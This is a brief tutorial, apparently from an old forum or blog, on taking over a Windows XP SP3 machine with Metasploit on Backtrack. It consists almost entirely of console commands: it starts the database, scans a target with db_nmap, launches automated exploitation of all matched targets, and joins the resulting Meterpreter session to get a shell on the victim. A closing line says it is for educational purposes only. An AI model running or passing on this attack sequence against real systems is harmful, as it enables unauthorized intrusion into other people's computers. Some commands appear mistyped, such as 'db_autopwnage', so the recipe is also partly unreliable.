How to own a Windows XP SP3 Box with Metasploit / Backtrack.

Tutorial: Metasploit DB Autopwning

Commands:

/etc/init.d/postgresql-8.3 start # start the database
msfconsole # start metasploit




db_connect pentest # connect to database
db_nmap HOST IP/ HOSTNAME # Scan for open Ports
db_autopwnage -e -p # -e = All matched Targets, # -p = Select Attacks based on open Ports

Wait until a Meterpreter Session, like:

*] Meterpreter session 1 opened (10.0.0.128:44919 - 10.0.0.130:33411)

Wait until the Attack is over or STRG+C to Terminate the Attack.

Now:

Sessions # shows your connects to the victim
Session -i 1 # you join session 1
shell # opens reverse shell on victim

Use the help function, to get information about other available commands.

FOR EDUCATIONAL PURPOSES ONLY